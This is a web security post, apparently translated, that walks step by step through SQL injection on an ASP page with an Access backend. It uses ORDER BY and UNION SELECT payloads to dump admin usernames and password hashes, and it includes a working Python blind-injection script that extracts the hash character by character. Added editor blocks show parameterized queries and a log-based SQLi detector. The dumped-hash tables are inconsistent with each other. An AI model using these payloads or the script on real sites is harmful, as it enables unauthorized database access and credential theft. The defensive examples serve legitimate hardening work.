Web security: ACCESS injection, blind injection script

Source: Internet
Author: User

http://www.xxx.cn/cp.asp?classid=3
http://www.xxx.cn/cp.asp?classid=3 and // the keyword "and" is blocked by the filter
http://www.xxx.cn/cp.asp?classid=3 and 1=1 // case-variation bypass of the keyword filter
http://www.xxx.cn/cp.asp?classid=3 and 1=2
http://www.xxx.cn/cp.asp?classid=3 ORDER by 8%16 // normal
http://www.xxx.cn/cp.asp?classid=3 ORDER by 9%16 // error: the query has 8 columns
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,2,3,4,5,6,7,8 from ADMIN%16 // page returns normally and column 2 is displayed, which confirms that the ADMIN table exists
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,id,3,4,5,6,7,8 from admin%16 // returns 4, 5, 7: three users, with IDs 4, 5 and 7

http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 1 1,admin,3,4,5,6,7,8 from admin%16 // lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 2 1,admin,3,4,5,6,7,8 from admin%16 // admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 3 1,admin,3,4,5,6,7,8 from admin%16 // admin8
Or
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=4%16 // lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=5%16 // admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=7%16 // admin8
Or again
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin%16 // dumps admin, admin8, lxiaofu

http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,pwd,3,4,5,6,7,8 from admin%16 // dumps 4817cc8dcbb3fb5, ae0284ccc20bdde, bbd06203b2ba922


To organize the results so far:

ID   admin     pwd
4    lxiaofu   bbd06203b2ba922
5    admin     ae0284ccc20bdde
7    admin8    4817cc8dcbb3fb5

But the MD5 hashes above are only 15 characters long; they should normally be 16 or 32 characters:

First check the length of the pwd field:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,len(pwd),3,4,5,6,7,8 from ADMIN%16 // returns 16, so the hash is 16 characters and the last one was cut off

Knowing the hash is 16 characters, extract the 16th character, selecting each row by ID:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid(pwd,16,1),3,4,5,6,7,8 from ADMIN WHERE id=4%16 // f
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid(pwd,16,1),3,4,5,6,7,8 from ADMIN WHERE id=5%16 // 8
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid(pwd,16,1),3,4,5,6,7,8 from ADMIN WHERE id=7%16 // c
Or, with a subquery in the displayed column:
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1,(select MID(pwd,16,1) from admin WHERE id=4),3,4,5,6,7,8 from admin%16 // f
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1,(select MID(pwd,16,1) from admin WHERE id=5),3,4,5,6,7,8 from admin%16 // 8
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1,(select MID(pwd,16,1) from admin WHERE id=7),3,4,5,6,7,8 from admin%16 // c


To organize the results so far:

ID   admin     pwd
4    lxiaofu   bbd06203b2ba922f
5    admin     4817cc8dcbb3fb58
7    admin8    ae0284ccc20bddec
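Every step above works for one reason: cp.asp pastes the classid parameter straight into its SQL text. The following Python is an example added by the editor, not code from the original post or from the site it describes. sqlite3 stands in for the Access backend (an assumption; the SQL shown is portable to it), the cp table and its rows are constructed, and the block puts the concatenating query beside a parameterized one with an integer allow-list, plus a small regression check that asserts the "and 1=1" / "and 1=2" oracle from the first stage of the walkthrough is gone.

```python
import sqlite3

# sqlite3 stands in for the Access database behind cp.asp (an assumption made for
# this example); the cp table and its rows are constructed, not from any real site.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cp (id INTEGER, classid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO cp VALUES (?, ?, ?)",
                     [(1, 3, "Product A"), (2, 3, "Product B"), (3, 12, "Product C")])
    return conn

def query_vulnerable(conn, classid):
    """The pattern the walkthrough exploits: the raw request parameter is
    concatenated into the statement, so '3 and 1=2' rewrites the WHERE clause."""
    sql = "SELECT id, title FROM cp WHERE classid=" + classid
    return conn.execute(sql).fetchall()

def query_safe(conn, classid):
    """Hardened form: validate the parameter against an integer allow-list, then
    bind it as a value. Whatever the string contains, it is only ever compared
    with the classid column and never parsed as SQL."""
    if not classid.isdigit():
        raise ValueError("classid must be a non-negative integer")
    return conn.execute("SELECT id, title FROM cp WHERE classid=?",
                        (int(classid),)).fetchall()

def has_boolean_oracle(query, conn, classid):
    """Regression check for the first stage on this page: does 'and 1=1' behave
    differently from 'and 1=2'? True means the parameter leaks a boolean oracle."""
    try:
        true_rows = query(conn, classid + " and 1=1")
        false_rows = query(conn, classid + " and 1=2")
    except (ValueError, sqlite3.Error):
        return False          # rejected up front or failed outright: no usable oracle
    return true_rows != false_rows

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable query leaks an oracle:", has_boolean_oracle(query_vulnerable, conn, "3"))  # True
    print("parameterized query leaks an oracle:", has_boolean_oracle(query_safe, conn, "3"))   # False
```

The allow-list check is what makes the later stages moot as well: "ORDER by 9", "UNION SELECT ..." and "and ASC(MID(...))" are all rejected before any SQL runs, and binding the value means even a parameter that legitimately has to be free text cannot change the statement's structure.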


Or use the blind injection script below to test it:

import requests

heads = {'user-agent': 'mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) gecko/20100101 firefox/52.0'}
# Candidate characters tried at each position of the hash. The original character
# set was mangled into "[email protected]" when the page was extracted and is kept as found.
payloads = '[email protected]_.'
pwd = []
for i in range(1, 17):          # positions 1..16 of the 16-character hash
    for payload in payloads:
        # Boolean condition: is the i-th character of pwd equal to this candidate?
        url = "http://www.xxx.cn/cp.asp?classid=24 and ASC((SELECT TOP 1 MID(pwd,{},1) from admin))={}".format(i, ord(payload))
        response = requests.get(url=url, headers=heads).content.decode(encoding='GBK')
        # print(url)
        if "?product_id=194" in response:   # marker that only appears on the "true" page
            pwd.append(payload)
            print('\n', 'pwd is: ', payload, end='')
            break
        else:
            print('.', end='')
print('\n[done] pwd: ', ''.join(pwd))
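From the defender's side, each stage shown on this page leaves a recognisable trace in the web server log. The script below is an example added by the editor, not part of the original post: the log lines are constructed in combined-log format to mirror the walkthrough, the rule that classid must be numeric is an assumption about the application, and the code decodes each query parameter, matches the boolean, ORDER BY, UNION and ASC/MID/LEN stages, flags any non-numeric value on a numeric parameter regardless of signature, and counts flagged requests per source address, since a character-by-character script like the one above produces a long run of near-identical probes from one client.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined-log shape (not taken from the page); they
# mirror the stages of the injection walkthrough against /cp.asp.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /cp.asp?classid=3 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0800] "GET /cp.asp?classid=3%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0800] "GET /cp.asp?classid=3%20and%201=2 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:04 +0800] "GET /cp.asp?classid=3%20ORDER%20by%209 HTTP/1.1" 500 310
10.0.0.5 - - [01/Jan/2024:10:00:05 +0800] "GET /cp.asp?classid=3%20UNION%20SELECT%201,pwd,3,4,5,6,7,8%20from%20admin HTTP/1.1" 200 5200
10.0.0.5 - - [01/Jan/2024:10:00:06 +0800] "GET /cp.asp?classid=24%20and%20ASC((SELECT%20TOP%201%20MID(pwd,1,1)%20from%20admin))=97 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0800] "GET /cp.asp?classid=12 HTTP/1.1" 200 4980
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Signatures for the stages on this page, matched after URL decoding so that
# %20 and mixed case do not hide them.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "char_extraction": re.compile(r"\b(?:asc|mid|len)\s*\(", re.I),
}

# Assumption: these parameters are documented as integers, so anything else is
# suspect even when no signature matches (the allow-list catches what regexes miss).
NUMERIC_PARAMS = {"classid"}

def analyse_line(line):
    """Parse one log line; return None if it is not in the expected shape."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):  # parse_qsl URL-decodes
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if name.lower() in NUMERIC_PARAMS and not value.strip().isdigit():
            hits.append("non_numeric_value")
        if hits:
            findings.append({"param": name, "value": value, "signatures": hits})
    return {"ip": m.group("ip"), "path": parts.path, "status": int(m.group("status")),
            "size": int(m.group("size")), "findings": findings}

def scan_log(text):
    """Return the records that triggered at least one finding, in log order."""
    return [rec for rec in map(analyse_line, text.splitlines()) if rec and rec["findings"]]

def probe_counts_by_ip(alerts):
    """Many flagged requests from one address is the shape of a blind
    extraction loop; count them per source so the burst stands out."""
    counts = {}
    for rec in alerts:
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    alerts = scan_log(SAMPLE_LOG)
    for rec in alerts:
        for f in rec["findings"]:
            print(rec["ip"], rec["status"], rec["path"], f["param"], f["signatures"])
    print("flagged requests per source:", probe_counts_by_ip(alerts))
```

On the constructed sample this flags five of the seven requests, all from 10.0.0.5, and the ORDER BY probe is also the only one answered with a 500, which is the error-page response the walkthrough relies on to count columns. The numeric allow-list is deliberately listed alongside the regexes: it is the signal that survives keyword filtering and encoding tricks, and it is the same check that fixes the application.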

